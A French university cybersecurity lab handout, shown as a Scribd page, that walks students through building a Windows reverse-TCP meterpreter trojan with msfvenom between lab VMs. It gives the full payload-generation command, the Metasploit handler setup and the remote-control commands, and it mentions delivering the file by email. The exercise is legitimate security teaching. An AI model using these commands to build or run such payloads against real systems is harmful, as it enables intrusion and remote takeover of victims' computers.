100% ont trouvé ce document utile (1 vote)
213 vues3 pages

Création de Malware avec Msfvenom

Ce TP montre comment créer un malware à l'aide de Msfvenom dans Metasploit. Il explique les commandes pour générer un fichier exe contenant un payload reverse_tcp, lancer le handler sur Kali et exécuter le malware sur la victime pour établir la connexion. Le but est d'apprendre à gérer le trafic réseau entre les machines et exécuter des commandes à distance sur la victime.

Transféré par

Salsa
Copyright
© © All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd
100% ont trouvé ce document utile (1 vote)
213 vues3 pages

Création de Malware avec Msfvenom

Ce TP montre comment créer un malware à l'aide de Msfvenom dans Metasploit. Il explique les commandes pour générer un fichier exe contenant un payload reverse_tcp, lancer le handler sur Kali et exécuter le malware sur la victime pour établir la connexion. Le but est d'apprendre à gérer le trafic réseau entre les machines et exécuter des commandes à distance sur la victime.

Transféré par

Salsa
Copyright
© © All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd

Université Batna2

Chahid Mostefa Benboulaid


Faculté des sciences Département d’informatique TP Cyber Sécurité 2

TP3: Création Malware (1/2)

Dans cette première partie du TP nous allons voir comment créer un


malware à l'aide de l'une des fonctionnalités de Metasploit framework, à
savoir, Msfvenom.

Msfvenom est un outil livré avec l'environnement Metasploit framework

Attention /!\: Vous n'avez pas le droit d'exploiter les malwares créés contre des machines
qui ne vous appartiennent pas.

1) Lancez vos machines virtuelles Kali et Windows et vérifiez ce qui suit:

a) Le ping entre les deux machines est fonctionnel dans les deux sens.
b) Sur votre VM Windows vérifiez que le pare-feu et l'antivirus sont désactivés.

2) Sur votre machine kali il faut sortir de la console "msfconsole" ensuite tapez la commande
"msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows -f exe
LHOST=<IP de votre machine kali> PORT=4444 -o /home/kali/Desktop/[Link]"

 -p: pour spécifier le payload à utiliser


 -a: pour spécifier l'architecture à utiliser pour la payload (32bits ou 64bits)
 --platform: pour spécifier le système d'exploitation (windows, linux, etc)
 -f: pour spécifier le format du fichier en sortie
 LHOST: l'adresse vers laquelle la machine victime doit se connecter une fois infectée
 PORT: pour spécifier le port de communication entre les machines attaquante et
victime.
 -o: pour spécifier le chemin de sauvegarde du fichier malveillant ainsi que son nom.

Une fois votre commande tapée, cliquez sur entrée et le fichier "[Link]" va se créer sur
votre bureau.

Afin d'infecter la machine cible, un attaquant pourra envoyer ce dernier par mail en tant que
pièce jointe au mail.

Avant d'aller exécuter ce programme malveillant sur la VM Windows (notre machine


victime), il faut être en écoute sur la machine kali pour intercepter la trafic et ensuite
exécuter les commandes depuis Kali vers la machine Windows. Pour cela, sur votre machine
kali :

a) Tapez la commande "msfconsole"

Enseignante: Nesrine KHERNANE


Université Batna2
Chahid Mostefa Benboulaid
Faculté des sciences Département d’informatique TP Cyber Sécurité 2

b) Tapez la commande "use exploit/multi/handler", cette commande permet de définir le


handler (une fonction qui va gérer nos commandes et l'activité réseau entre la machine kali
et windows)

c) Tapez la commande "show options":

 Quel est le payload affiché avec cette commande ?


 Est ce que c'est le bon payload ?

d) Tapez la commande "set payload windows/meterpreter/reverse_tcp "

e) Tapez la commande "show options":

 Quel est le payload affiché avec cette commande ?


 Est ce que c'est le bon payload ?

f) Tapez la commande "set LHOST <IP de la machine Kali>"

g) Tapez la commande "set LPORT 4444"

h) Tapez la commande "run" ou "exploit"

Vous aurez le message suivant [*] Started reverse TCP handler on <IP de la machine
Kali>:4444. Que signifie ce message ?

Maintenant que notre machine Kali est prête à recevoir le trafic, rendez-vous sur votre
machine Windows (avec le pare-feu et antivirus désactivés).

Lancez le programme "[Link] " après l'avoir transféré sur votre machine Windows. Que
dis la fenêtre qui s'affiche ?

Cliquez sur "Exécuter". Une fois le programme exécuté, que remarque vous dans votre
machine kali ?

Enseignante: Nesrine KHERNANE


Université Batna2
Chahid Mostefa Benboulaid
Faculté des sciences Département d’informatique TP Cyber Sécurité 2

i) Tapez la commande "pwd"

j) Tapez la commande "execute -f [Link]"

k) Tapez la commande "ps", vous pouvez fermer n'importe quel processus avec la
commande "kill <PID de l'application>"

l) vous pouvez tapez les commande "reboot", "shutdown", etc.

Quelle est la différence entre ce tp et le tp précédent ?

Enseignante: Nesrine KHERNANE

Vous aimerez peut-être aussi